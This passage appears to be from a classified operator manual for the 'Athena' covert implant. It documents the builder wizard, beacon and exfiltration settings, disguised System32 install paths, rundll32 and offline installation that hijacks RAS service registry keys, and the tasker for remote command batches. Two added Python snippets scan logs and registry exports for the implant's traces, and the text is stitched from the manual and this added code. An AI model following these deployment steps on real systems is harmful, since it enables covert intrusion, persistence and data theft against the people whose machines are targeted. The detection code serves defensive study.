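    if {"private", "no-store", "max-age=0"} <= directives:
        found.append("request Cache-Control contains private,no-store,max-age=0")
    return found


# Constructed sample log lines and headers (not taken from the manual).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2016:10:00:00 +0000] "GET /blog/comm?keyword=Qz81kLm&matchtype=p HTTP/1.1" 200 1532',
    '10.0.0.7 - - [01/Mar/2016:10:00:01 +0000] "GET /index.html?keyword=shoes&page=2 HTTP/1.1" 200 8812',
    '10.0.0.5 - - [01/Mar/2016:10:00:05 +0000] "POST /php/id?event?a=9fB2y=false HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Mar/2016:10:00:09 +0000] "GET /css/site.css HTTP/1.1" 200 4410',
    '10.0.0.5 - - [01/Mar/2016:10:01:00 +0000] "GET /?activityi;src=Wq7 HTTP/1.1" 200 1532',
]
SAMPLE_HEADERS = {
    "Host": "abc.com",
    "Accept-Encoding": "application/octet-stream",
    "Cache-Control": "private, no-cache, no-store, max-age=0",
    "Cookie": "session-id=Qk3mP9xA",
}

if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG):
        print(hit)
    print(beacons_per_client(scan_log_lines(SAMPLE_LOG)))
    print(beacon_header_indicators(SAMPLE_HEADERS))
```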

5.3.3 (U) Data Formatting
(S//NF) Before being sent back to the LP, the data undergoes the following transformations:
• Data hash is computed using zlib adler32
• Data is zlib compressed
• Data is RSA encrypted
• Data hash is appended to the data
• Data signed digest is appended to the data
• Masked parent and child ID are appended to the data

5.3.4 (U) Communications Settings
(S//NF) The connection logic to the LP takes into account the user configured proxy, IE
proxy, WPAD proxy, and direct connection. The CommMod will save and send back
to the LP any proxy information that was found for later use. The CommMod will use
the connection settings in the following order:
1. User configured Proxy settings
2. Direct Connection
3. IE previously saved Proxy settings
4. WPAD previously saved Proxy settings
5. Try the IE Proxy. If it is a new proxy setting then it will be saved for future use and sent back
to the LP.
6. Try the WPAD Proxy. If it is a new proxy setting then it will be saved for future use and sent
back to the LP.

6. (U) Builder
(S//NF) Some general usage comments are presented below:
• Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
• The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
• Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.

6.1 (U) Usage
(S//NF) This section contains information for configuring an implant. Figure 9 below shows the
command line options for the Builder.

Warning
(S//NF) Implant configuration may be completed on the lowside; however, the operator should be aware that
cryptographic key data will be in the clear.
(S//NF) By default, the Builder will walk the operator through the process of configuring an
implant (via the wizard) that will be deployed to a target computer. Alternatively, the operator
can also input all configuration values via command line arguments in order to build an implant
with a single command.
Builder
usage: builder.py [-h] [-i SYSTEM_BINARY_PATH] [-r SYSTEM_IMPORT_XML]
[-o SYSTEM_EXPORT_PATH] [-w] [-b] [--debug]
Builder Configuration
optional arguments:
-h, --help
show this help message and exit
-i SYSTEM_BINARY_PATH, --input SYSTEM_BINARY_PATH
This argument provides the location of the raw binary
data files. (NOTE: .\bin is the default path).
-r SYSTEM_IMPORT_XML, --receipt SYSTEM_IMPORT_XML
This argument defines an existing receipt filename to
be used for default values.
-o SYSTEM_EXPORT_PATH, --output SYSTEM_EXPORT_PATH
This argument provides the output directory path to
store the target files (NOTE: .\builder_output is the
default path).
-w, --wizard
This argument will request information from the user
via the wizard.
-b, --bravo
This argument builds the Athena BRAVO implementation.
--debug
This argument allows debugging information to be
included in the output directory.

Figure 9 - (S//NF) Builder Command Line Options

6.2 (U) Command Line Options
The builder.py script has multiple command line options. For most users, no command line
options are required. The local directory will be used to output results.
Usage: python.exe builder.py

6.2.1 (U) System Binary Path
(S//NF) This argument provides the location of the raw binary data files. The default location is
in the current directory in the BIN folder. Figure 10 (below) shows the files that must reside in
the system binary path.

BIN
├───offline            - linux offline files
│       functions.sh
│       linux.sh
│       reged.static
│       target_x64.ini
│       target_x86.ini
├───x64                - 64 bit implant components
│       command.axe
│       engine.axe
│       host.dll
│       install.dll
│       offline.exe
│       ram_only.dll
│       uninstall.axe
└───x86                - 32 bit implant components
        command.axe
        engine.axe
        host.dll
        install.dll
        offline.exe
        ram_only.dll
        uninstall.axe

Figure 10 - (S//NF) System Binary Path

6.2.2 (U) System Import XML
(S//NF) This argument provides the location of the existing receipt file to be used for
configuration information. This option is used to input specific information into this build (e.g.
use this option to create an exact copy of an existing build).

6.2.3 (U) System Export Path
(S//NF) This argument provides the output directory path to store the target files. By default, the
.\builder_output path is the location for the output. A sub-directory called RECEIPTS is
created in this directory to contain all receipts created by this installation. This simplifies parsing
by having all receipts in a single location. When creating implants for a group of targets, the
parent name will be in the output directory (e.g. .\builder_output\test). If a build is generated for
a specific child, the child name will be incorporated into the name of the output directory (e.g.
.\builder_output\test_ABCD0086).

6.2.4 (U) Debug
(S//NF) This argument allows debugging information to be included in the output directory.
When this option is selected, an additional debug directory is included in the output. This
contains all intermediary files required by the Builder and can be used to support debugging.

6.3 (U) Wizard

(S//NF) The following (Figure 11) shows an example of using the wizard option of the Builder in
order to configure and build an implant. Select the default value by using ENTER key.
$ python.exe builder.py
Builder
Generating client RSA key pair
Generating server RSA key pair
Athena Wizard:
This wizard will guide you through the input options for the Athena tool.
Press enter to accept default value.

Target - Parent ID (4 chars)
default:[RnzI]
new value:
Target - Child ID (number - dword)
default:[]
new value:
Target - dynamic data config type (internal,file,registry)
default:[internal]
new value:
Beacon - Interval in seconds (number)
default:[86400]
new value:
Beacon - Jitter as a percentage of Interval 0..100 (number)
default:[5]
new value:
Beacon - Boot Delay in seconds (number)
default:[60]
new value:
Beacon - Hibernation Delay in seconds (number)
default:[60]
new value:
Beacon - Tasking Delay in seconds (number)
default:[60]
new value:
Beacon - Domains (LP Server DNS hostname or IP Addresses separated by a comma)
default:[None]
new value: abc.com
Beacon - Port (number)
default:[443]
new value:
Beacon - Proxy Port NOTE:0=disable (number)
default:[0]
new value:
Beacon - User Agent String (string)
default:[Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)]
new value:
Beacon - URL Path for LP (string)
default:[/]
new value:
Beacon - Accept Header (string)
default:[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
new value:
Beacon - Accept Language Header (string)
default:[en-US,en;q=0.5]
new value:
Beacon - Accept Encoding Header (string)
default:[application/octet-stream]
new value:
Beacon - IE Proxy Address (string)
default:[]
new value:
Beacon - WPAD Proxy Address (string)
default:[]

new value:
Tasking - Overt State File Path (string)
default:[]
new value:
Tasking - Batch Execution Timeout in seconds (number)
default:[0]
new value:
Tasking - Command Execution Timeout in seconds (number)
default:[0]
new value:
Tasking - Chunk Size - maximum number of bytes in a single block (number)
default:[0]
new value:
Tasking - Max CPU Utilization 0..100 (number)
default:[0]
new value:
Tasking - Max Processing Data Size (number)
default:[50331648]
new value:
Uninstall - Date (YYYY-MM-DDTHH:MM:SS) - UTC
default:[]
new value:
Uninstall - Deadman Delay in seconds (number)
default:[0]
new value:
Uninstall - Beacon failure attempts (number)
default:[0]
new value:
Uninstall - Kill File Path - full file path on target (string)
default:[]
new value:
Install - Target File Name (string)
default:[%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll]
new value:
Install - Data File Name (string)
default:[%SystemRoot%\System32\CodeIntegrity\ras.cache]
new value:
Install - Restart service with Service Control Manager (SCM) (no,yes)
default:[yes]
new value:
[WIZARD COMPLETE]

Figure 11 - (S//NF) Builder Wizard Review

6.4 (U) Configuration
(U) This section contains the steps with detailed instructions/notes for configuring an implant.

Table 7 - (S//NF) Step-By-Step Implant Configuration Instructions

Columns: Step / Action (help text) / Notes / Type

1. Target - Parent ID (4 chars)
   default:[RnzI]
   new value:
   Notes: The name used for this group of implants.
   Type: Name – 4 characters in length

2. Target - Child ID (number - dword)
   default:[]
   new value:
   Notes: The optional name of a specific implant known as a child. This option allows the user to
   define a specific implant; otherwise the system will use the first 4 bytes of the mac address or a
   random number.
   Type: Name – dword – default is mac address (4bytes)

3. Target - dynamic data config type (internal,file,registry)
   default:[internal]
   new value:
   Notes: The default location of configuration settings that change on the target.
     internal - 0 - use data file to store config
     file - 1 - use external file to store config
     registry - 2 - use registry to store config
   The user must enter a subsequent value when selecting the file or registry option. See the
   example entries below.
   Type: File - define the full path and file name. NOTE: name can include environment variables.
         Examples: c:\temp\a.txt or c:\%SystemRoot%\a.txt
         Registry - define the full path to the registry value. Default Hives:
           HKLM -> HKEY_LOCAL_MACHINE
           HKCR -> HKEY_CLASSES_ROOT
           HKCC -> HKEY_CURRENT_CONFIG
           HKCU -> HKEY_CURRENT_USER
           HKUS -> HKEY_USERS
         Examples: HKLM\SOFTWARE\Microsoft\Value or HKCU\SOFTWARE\ATHENA
   Example (file):
     Target - dynamic data config type (internal,file,registry)
     default:[internal]
     new value: file
     Target - dynamic data config path (file name or registry value name)
     default:[None]
     new value: c:\temp\myfile.txt
   Example (registry):
     Target - dynamic data config type (internal,file,registry)
     default:[internal]
     new value: registry
     Target - dynamic data config path (file name or registry value name)
     default:[None]
     new value: HKLM\SOFTWARE\Microsoft\myvalue
       or HKLM\SOFTWARE\Microsoft\ATHENA

4. Beacon - Interval in seconds (number)
   default:[86400]
   new value:
   Notes: The default time between beacons.
   Type: Time in seconds

5. Beacon - Jitter as a percentage of Interval 0..100 (number)
   default:[5]
   new value:
   Notes: The default jitter used to randomize the beacon time based on a percentage of the
   interval time. (NOTE: 0 disables jitter)
   Type: Percentage (0..100)

6. Beacon - Boot Delay in seconds (number)
   default:[60]
   new value:
   Notes: The default boot delay for the implant. The amount of time to wait after a reboot.
   Type: Time in seconds

7. Beacon - Hibernation Delay in seconds (number)
   default:[60]
   new value:
   Notes: The default hibernation delay for the implant. The amount of time to wait before the
   first beacon will be processed.
   Type: Time in seconds

8. Beacon - Tasking Delay in seconds (number)
   default:[60]
   new value:
   Notes: The default tasking delay for all commands processed.
   Type: Time in seconds

9. Beacon - Domains (LP Server DNS hostname or IP Addresses separated by a comma)
   default:[None]
   new value: abc.com
   Notes: The default domain name (hostname or IP address) of the Listening Post to be used for
   beaconing.
   Type: Time in seconds

10. Beacon - Port (number)
    default:[443]
    new value:
    Notes: The default port number used to beacon from the target.
    Type: Port number(0..65535)

11. Beacon - Proxy Port NOTE:0=disable (number)
    default:[0]
    new value:
    Notes: The default proxy port for processing beacons on the target.
    Type: Port number(0..65535)

12. Beacon - User Agent String (string)
    default:[Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)]
    new value:
    Notes: The default user agent string placed in the header when processing beacons on the
    target.
    Type: String

13. Beacon - URL Path for LP (string)
    default:[/]
    new value:
    Notes: The default URL path on the server that is used for processing beacons on the target.
    WARNING: This value MUST be in the DATA_URLS field in the config.json file on the LP.
    Type: String

14. Beacon - Accept Header (string)
    default:[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
    new value:
    Notes: The default accept header in the packet when processing beacons on the target.
    Type: String

15. Beacon - Accept Language Header (string)
    default:[en-US,en;q=0.5]
    new value:
    Notes: The default accept language header in the packet when processing beacons on the
    target.
    Type: String

16. Beacon - Accept Encoding Header (string)
    default:[application/octet-stream]
    new value:
    Notes: The default accept encoding header in the packet when processing beacons on the
    target. WARNING: Changing this value may cause unexpected results when processing data on
    the target.
    Type: String

17. Beacon - IE Proxy Address (string)
    default:[]
    new value:
    Notes: The default IE Proxy Address used to proxy beacon communication on the target.
    Type: String

18. Beacon - WPAD Proxy Address (string)
    default:[]
    new value:
    Notes: The default WPAD Proxy Address used to proxy beacon communication on the target.
    Type: String

19. Tasking - Overt State File Path (string)
    default:[]
    new value:
    Notes: The default overt state file path used to store state information during processing of
    commands. (NOTE: when empty – no state information is stored on target). This directory will
    store state files (random file names) of current processing information.
    Type: String – full path

20. Tasking - Batch Execution Timeout in seconds (number)
    default:[0]
    new value:
    Notes: The default batch execution timeout is used to cancel processing of long running
    batches.
    Type: Time in seconds

21. Tasking - Command Execution Timeout in seconds (number)
    default:[0]
    new value:
    Notes: The default command execution timeout is used to cancel processing of long running
    commands.
    Type: Time in seconds

22. Tasking - Chunk Size - maximum number of bytes in a single block (number)
    default:[0]
    new value:
    Notes: The default chunk size of a packet sent from the target to the Listening Post.
    Type: Number in bytes

23. Tasking - Max CPU Utilization 0..100 (number)
    default:[0]
    new value:
    Notes: The default maximum CPU utilization used by the system while processing commands.
    Type: Percentage of system usage(0..100)

24. Tasking - Max Processing Data Size (number)
    default:[50331648]
    new value:
    Notes: The default maximum processing data size of the data to process on target.
    Type: Number in bytes

25. Uninstall - Date (YYYY-MM-DDTHH:MM:SS) – UTC
    default:[]
    new value:
    Notes: The default time and date of the automatic self-deletion of the target executable.
    Type: Date (YYYY-MM-DDTHH:MM:SS)

26. Uninstall - Deadman Delay in seconds (number)
    default:[0]
    new value:
    Notes: The default delay that the target will self-delete after not receiving a valid beacon.
    Type: Time in seconds

27. Uninstall - Beacon failure attempts (number)
    default:[0]
    new value:
    Notes: The default number of beacon failure attempts to force a self-delete of the target
    executable.
    Type: Number

28. Uninstall - Kill File Path - full file path on target (string)
    default:[]
    new value:
    Notes: The default kill file name that is used to force a self-delete when the file is present
    on the target system.
    Type: File Name

29. Install - Target File Name (string)
    default:[%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll]
    new value:
    Notes: The default file path used for the host target file.
    Type: File Name

30. Install - Data File Name (string)
    default:[%SystemRoot%\System32\CodeIntegrity\ras.cache]
    new value:
    Notes: The default file path used for the data file on the target system.
    Type: File Name

31. Install - Restart service with Service Control Manager (SCM) (no,yes)
    default:[yes]
    new value:
    Notes: The option to restart the service after install. Otherwise, the tool will be installed
    and will not start until next reboot or restart of the host service.
    Type: Yes/No

6.5 (U) Output
(U) The Builder produces multiple output components. All receipts will be placed in the receipts
folder. Each build will be in its own directory and contain all target specific files.

6.5.1 (U) Output Receipt File
(S//NF) The Builder outputs an XML receipt file containing all the configuration settings for a
target. The receipt file is required when tasking implants and parsing output from a target. The
receipt file name will include the parent id as well as the child id if one exists (e.g.
test_ABCD0064_receipt.xml). Figure 12 shows an example of the receipt file format.



[Figure 12 body not reproducible here: the receipt's XML element tags were lost in extraction. The
visible values show a receipt for parent "test" and child 0xABCD0064, configured to beacon to
10.3.2.56 on port 443 at URL path /octopus/ with the default user agent and the default install
paths, and carrying the client and server RSA key pairs (PEM blocks omitted).]

Figure 12 - (S//NF) Example Receipt File - XML

6.5.1 (U) Output Target Files
(S//NF) The Builder outputs files that are used to manage the target implant. Figure 13 shows
the listing of the files included in a standard target configuration.

│   builder.log                 - output log from the Builder
│   test_ABCD0064_receipt.xml   - target receipt file
│
├───installer                   - NOD spec installation files
│       installer_x64.dll       - 64 bit installation dll
│       installer_x86.dll       - 32 bit installation dll
│
├───offline
│   ├───linux                   - linux offline installation files
│   │       functions.sh
│   │       linux.sh
│   │       reged.static        - registry editor
│   │       target_x64.dat
│   │       target_x64.dll
│   │       target_x64.ini
│   │       target_x86.dat
│   │       target_x86.dll
│   │       target_x86.ini
│   │
│   └───windows                 - windows offline installation files
│           offline_x64.exe     - installer for 64 bit recovery OS
│           offline_x86.exe     - installer for 32 bit recovery OS
│           target.ini          - configuration for specific implant
│           target_x64.dat
│           target_x64.dll
│           target_x86.dat
│           target_x86.dll
│
└───ram_only                    - NOD spec ram-only version of Athena
        ram_only_x64.dll        - 64 bit run dll
        ram_only_x86.dll        - 32 bit run dll

Figure 13 - (S//NF) Builder Output Files
Note

(S//NF) Athena's Builder has a --debug option that will build
all the intermediate files and place them in a debug directory
in the Builder output directory.


7. (U) Implant Installation
7.1 (U) Overt Installation on Disk Mode
(S//NF) Once the target is created with the Builder, the implant can be installed with the Installer
DLL. The specific name can be changed when deploying using a DLL file.
• Installer_x64.dll – 64 bit installation DLL
• Installer_x86.dll – 32 bit installation DLL
(S//NF) Another tool is required to load the Installer onto the system. For testing
purposes only, rundll32.exe (with Administrator access) can be used as the loader tool.
However, testing the Installer using rundll32.exe may be flagged by the PSP (see
discussion in Section 10.2).
Usage: rundll32 installer_x64.dll,#2
Note
(S//NF) The Shellterm entry point is at ordinal 1 and the
rundll32 entry point is at ordinal 2.

7.2 (U) Random Access Memory-Only (RAM-Only) Mode
(S//NF) Once the target is created with the Builder, the implant can be run in memory with the
ram_only DLL. The specific name can be changed when deploying via a DLL file.
• ram_only_x64.dll – 64 bit ram-only DLL
• ram_only_x86.dll – 32 bit ram-only DLL
(S//NF) Another tool is required to run the RAM-only instance on a system. For testing,
rundll32.exe can be used as the loader tool.
Usage: rundll32 ram_only_x64.dll,#2

7.3 (U) Implant Offline Installation

(S//NF) The Offline Installer sets up Athena/Hera on an unbooted computer and updates the
computer’s registry. The Installer can be run from a remote operating system by using a Linux
boot disk (e.g., Ubuntu v14.04) or a Windows Installation disk and the Recovery Console.

7.3.1 (U) Offline Windows Installation
(S//NF) The Offline Windows Installer requires a Windows distribution that has an active
Recovery Console. The bitness of the Windows distribution does not affect the installation but
the correct version of the Installer must be run in the console -- the Offline Installer version must
match the bitness of the Windows Recovery Console. Either installation will resolve the correct
target installation files.
• offline_x64.exe – for use with the 64 bit Recovery Console
• offline_x86.exe – for use with the 32 bit Recovery Console

>offline_x64.exe
OFFLINE::Dec 21 2015
USAGE: offline 
Searching C:
Searching D:
Searching X:
Update options:
1) C:\Windows (x64)
2) D:\Window10 (x64)

Select instance to update (q or x to quit):2
Processing: D:\Window10 (x64)
>> Reg: SYSTEM\CurrentControlSet\Services\RemoteAccess\RouterManagers\Ip
DLLPath -> %SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll
Start -> 0x02
Type -> 0x20
>> Reg: SYSTEM\CurrentControlSet\Services\RasMan
Start -> 0x02
Type -> 0x20
>> Reg: SYSTEM\CurrentControlSet\Services\SstpSvc
Start -> 0x02
Type -> 0x20
>> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dll
Dest: D:\Window10\system32\microsoft\crypto\ras\iprcache.dll
>> Source:d:\Athena\builder_output\test_ABCD0064\offline\windows\target_x64.dat
Dest: D:\Window10\system32\codeintegrity\ras.cache
SUCCESS

Figure 14 - (S//NF) Windows Offline Installer
(S//NF) Figure 14 shows the output from an Offline Installer session. The installation script will
scan all mounted disks and determine potential Windows versions. A list will be displayed and
the user can select the specific instance to install.
Note

(S//NF) The offline tool allows alternate paths to be included
on the command line as arguments.
USAGE: offline.exe 
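As an added defender-side check (not code from the manual), the following Python parses a reg export of the keys that the offline installer rewrites in Figure 14 and reports deviations. The stock DLLPath value %SystemRoot%\System32\iprtrmgr.dll (the path that also appears in the Figure 12 receipt), the manual-start (3) defaults assumed for RasMan and SstpSvc, and both registry exports are assumptions constructed for the example.

```python
import re
from typing import Dict, List

# Assumed stock value of the IP router-manager DLL on a host that has not been modified.
STOCK_ROUTER_DLL = r"%SystemRoot%\System32\iprtrmgr.dll"
SERVICES = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
IP_ROUTER_KEY = SERVICES + r"\RemoteAccess\RouterManagers\Ip"
# Assumed stock Start values (3 = manual) for the two services Figure 14 switches to 0x02 (automatic).
EXPECTED_START = {SERVICES + r"\RasMan": 3, SERVICES + r"\SstpSvc": 3}

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _decode_value(raw: str):
    """Decode the reg export value syntaxes that matter here: strings, dwords and REG_EXPAND_SZ."""
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    if raw.startswith("hex(2):"):
        data = bytes(int(h, 16) for h in raw[len("hex(2):"):].split(",") if h)
        return data.decode("utf-16-le").rstrip("\0")
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return raw


def parse_reg_export(text: str) -> Dict[str, Dict[str, object]]:
    """Parse a 'Windows Registry Editor Version 5.00' export into {key: {value name: value}}."""
    # reg export wraps long hex values with ',\' at the end of a line; rejoin them before parsing.
    text = re.sub(r",\\\r?\n\s*", ",", text)
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if current is not None and m:
            keys[current][m.group(1)] = _decode_value(m.group(2))
    return keys


def audit_ras_persistence(reg_text: str) -> List[str]:
    """Report deviations in the RAS-related keys that the offline installer (Figure 14) rewrites."""
    keys = parse_reg_export(reg_text)
    findings: List[str] = []
    dll = keys.get(IP_ROUTER_KEY, {}).get("DLLPath")
    if isinstance(dll, str) and dll.lower() != STOCK_ROUTER_DLL.lower():
        findings.append(f"RouterManagers\\Ip DLLPath is {dll} (expected {STOCK_ROUTER_DLL})")
    for key, expected in EXPECTED_START.items():
        start = keys.get(key, {}).get("Start")
        if isinstance(start, int) and start != expected:
            service = key.rsplit("\\", 1)[-1]
            findings.append(f"{service} Start={start:#04x} (expected {expected:#04x})")
    return findings


def _expand_sz(value: str) -> str:
    """Encode a string the way reg export writes REG_EXPAND_SZ (UTF-16LE, NUL-terminated)."""
    return "hex(2):" + ",".join(f"{b:02x}" for b in (value + "\0").encode("utf-16-le"))


def _export(dll_path: str, start: int) -> str:
    """Build a constructed reg export (not a real capture) with the given DLLPath and Start values."""
    return (
        "Windows Registry Editor Version 5.00\n\n"
        f"[{IP_ROUTER_KEY}]\n\"DLLPath\"={_expand_sz(dll_path)}\n\n"
        f"[{SERVICES}\\RasMan]\n\"Start\"=dword:{start:08x}\n\"Type\"=dword:00000020\n\n"
        f"[{SERVICES}\\SstpSvc]\n\"Start\"=dword:{start:08x}\n\"Type\"=dword:00000020\n"
    )


# Constructed samples: one host in the state Figure 14 leaves behind, one with the assumed stock values.
SUSPECT_EXPORT = _export(r"%SystemRoot%\System32\Microsoft\Crypto\RAS\iprcache.dll", 2)
CLEAN_EXPORT = _export(STOCK_ROUTER_DLL, 3)

if __name__ == "__main__":
    for finding in audit_ras_persistence(SUSPECT_EXPORT) or ["no deviations found"]:
        print(finding)
```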

7.3.1 (U) Offline Linux Installation
(S//NF) The Offline Linux Installer requires the components and versions listed in Table 8
below. The Ubuntu v14.04 installation media will contain the correct versions of required
software for the offline Linux installation.

Table 8 - (S//NF) Required Offline Installer Components
Component (Utility)   Version
bash                  4.3.8 or greater
sed                   4.2.2
od                    8.2.1 or greater
reged.static          0.1 140201 (included in the Athena distribution)
fdisk                 2.20.1 or greater
mawk                  1.3.3 or greater
grep                  2.16-1 or greater
mount                 2.20.1-5 or greater
file                  1.5.14 or greater

(S//NF) Begin the Linux based offline installation by booting the target with a Linux boot disk
(i.e. Ubuntu installation media). Insert or download the Athena/Hera media. The Athena/Hera
Media should contain two shell scripts (linux.sh, functions.sh) and an INI configuration file
(usually target.ini). Configuration parameters for the target are pulled from the INI file.
(S//NF) Run ./linux.sh . You will be prompted to select any available target windows
partitions. Select the corresponding number as shown in Figure 15. Once you select the
partition, the Windows architecture will be determined via a file utility call and the appropriate
binaries will be deployed. Once installation is successful, restart the target machine.

Figure 15 - (S//NF) Linux Offline Installation

8. (U) Tasker
(S//NF) Some general usage comments are presented below:
• Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
• The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
• Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.

8.1 (U) Usage
(S//NF) This section contains information for tasking an implant. Figure 16 (below) shows the
command line options for the Tasker.
Warning

(S//NF) Implant tasking may be completed on the low-side;
however, the operator should be aware that cryptographic key
data will be in the clear.

(S//NF) By default, the Tasker allows the Operator to interactively build tasking for an implant
or implant family. Alternatively, the operator can also input tasking via a scripted tasking file.
>python.exe tasker.py -h
usage: tasker.py [-h] [-r RECEIPT] [-s SCRIPT] [-g GENERATE] [-p PRIORITY]
[-x] [-e] [--id ID] [--debug]
Tasker Configuration
optional arguments:
-h, --help
show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename to
be used for processing.
-i SCRIPT, --import SCRIPT
This argument provides the ability to import a script
for processing.
-g GENERATE, --generate GENERATE
This argument provides the output path location.
-p PRIORITY, --priority PRIORITY
This argument provides ability to set the
priority/ordering (0..255) NOTE: 128->default and
0->highest.
-x, --persist
This argument provides ability to set the batch as a
persistent batch.
-e, --stoponerror
This argument provides ability to stop the batch on a
command execution error.
--id ID
This argument provides the ability to force a specific
initial task ID for a tasking session (usually just
used for debugging purposes - number is decoded as
hex).
--debug
This argument allows debugging information to be
included in the output directory.

Figure 16 - (S//NF) Tasker Command Line Options

8.2 (U) Command Line Options
(S//NF) The Tasker has multiple command line options; however the tool may be invoked
without any command line options. The local directory will be used to output results.

Usage: python.exe tasker.py

8.2.1 (U) RECEIPT
(S//NF) This argument defines an existing receipt filename to be used for processing. A receipt
file is generated by the Builder and contains all the settings for the configured implant.

8.2.2 (U) SCRIPT
(S//NF) This argument provides the ability to import a script for processing. A script is simply a
text file that contains all the commands in a batch script. The following sections will describe
the syntax for the command script.

8.2.3 (U) GENERATE
(S//NF) This argument provides the output path location. By default, the output will be stored in
the tasker_output directory. This option will override the location for the tasking output
information.

8.2.4 (U) PRIORITY
(S//NF) This argument provides ability to set the priority/ordering (0..255) NOTE:
128->default and 0->highest. Since each beacon will only retrieve a single batch command, this
option allows the user to prioritize the command files to the target.

8.2.5 (U) PERSIST
(S//NF) This argument marks the batch as persistent. Normally, once a command file has been
served by the Listening Post it is deleted. A persistent batch remains on the server and is served
on every beacon for which no other batch is waiting; this is how SAFETY files are used. The
special SAFETY command writes no data to disk on the target but still produces a response from
the target. Without it, a target with no waiting tasking does not POST a response to the server at
all. NOTE: the responses to these persistent batches are stored in the SAFETIES directory.

8.2.6 (U) STOPONERROR
(S//NF) This argument provides the ability to stop the batch on a command execution error.
Should a command in the batch fail (e.g. PUT "c:\myfile"), the remaining commands can be
cancelled to prevent undefined behavior of the batch. By default, STOPONERROR is set to false,
since with most commands (e.g. "exec net stat") there are no side effects that need to be validated.

8.2.7 (U) ID
(S//NF) This argument provides the ability to force a specific initial task ID for a tasking
session (usually just used for debugging purposes - number is decoded as hex).

8.2.8 (U) DEBUG
(S//NF) This argument allows debugging information to be included in the output directory.


8.3 (U) User Interface
(S//NF) The Tasker shell interface allows for an interactive processing mode. There are two
input options. Selecting a management feature or command feature and pressing enter presents a
wizard that prompts for all required options for the feature. Alternatively, for more advanced
users, a command line with tab-complete can be used to enter a complete command on a single
line. The format of a command feature entered this way is identical to the script output format.
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Welcome to the Athena Tasker shell.

Type help or ? to list commands.

Figure 17 - (S//NF) Tasker Main Menu

8.3.1 (U) Management Features
(S//NF) The Tasker Management Features control the batch file created to task a specific
implant. The receipt defines the Parent ID of the target to be tasked. Each set of commands is
known as a batch, and each batch file carries a unique Batch ID.
8.3.1.1 (U) Receipt
(S//NF) This command updates the target reference by loading the receipt.xml file defined for
the target.
Usage: receipt 
Example: receipt builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Output:
New Receipt Loaded:
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
8.3.1.2 (U) Generate
(S//NF) This command will generate an encrypted batch file ready for deployment on the
Listening Post. This command has additional options:
• Priority (number 0..255): 0-highest, 255-lowest – priority for the server to process the batch
• Persist (bool): true-do not delete, false-delete once sent – force a file to always be run during a beacon cycle. This has lower priority than other batch commands waiting for processing.
• Stop On Error (bool): true-do not continue processing the batch on command failure; false-continue processing all batch commands irrespective of error status
• Output Path: location where the batch information is stored (default: .\tasker_output)
Usage: generate priority=128 persist=false stoponerror=false output=.\tasker\output
Example: generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-high, 255-low)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\console\tasker\tasker_output\test
RSA encrypting header with client public key
BINARY: __128_test_ABCD0064_63A95A3C
SCRIPT: __128_test_ABCD0064_63A95A3C_script.txt
BATCH: 63A95A3C
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
New Batch ID=0x8E9F251C
Output:
New Receipt Loaded:

Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
8.3.1.3 (U) LS
(S//NF) This command will list the batch id and all commands defined for this batch. They are
numbered from zero and can be referenced by this index.
Usage: ls
Example: ls
Output:
BATCH: DAD72903
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
8.3.1.4 (U) RM
(S//NF) This command removes a single command from the current batch. Each command is
referenced by a zero-based index; these indexes can be viewed with the LS command shown
above.
Usage: rm 
Example: rm 1
Output:
REMOVED: uninstall pre=0
8.3.1.5 (U) Import
(S//NF) This command imports commands from a generated script. Script files are text files
with a .txt extension. The imported commands are appended to the current batch, and the output
lists each command that was imported. Use the LS command to view the complete list.
Usage: import 
Example: import tasker_output\test\__128_test_ABCD0064_DAD72903_script.txt
Output:
New Script Loaded: tasker\tasker_output\test\__128_test_ABCD0064_DAD72903
_script.txt
COMMAND: uninstall pre=0
8.3.1.6 (U) ID
(S//NF) The ID command is used to force a specific batch ID for the Tasker to generate. This
command is generally used for debug purposes only.
Usage: id 

SECRET//NOFORN

30

SECRET//NOFORN
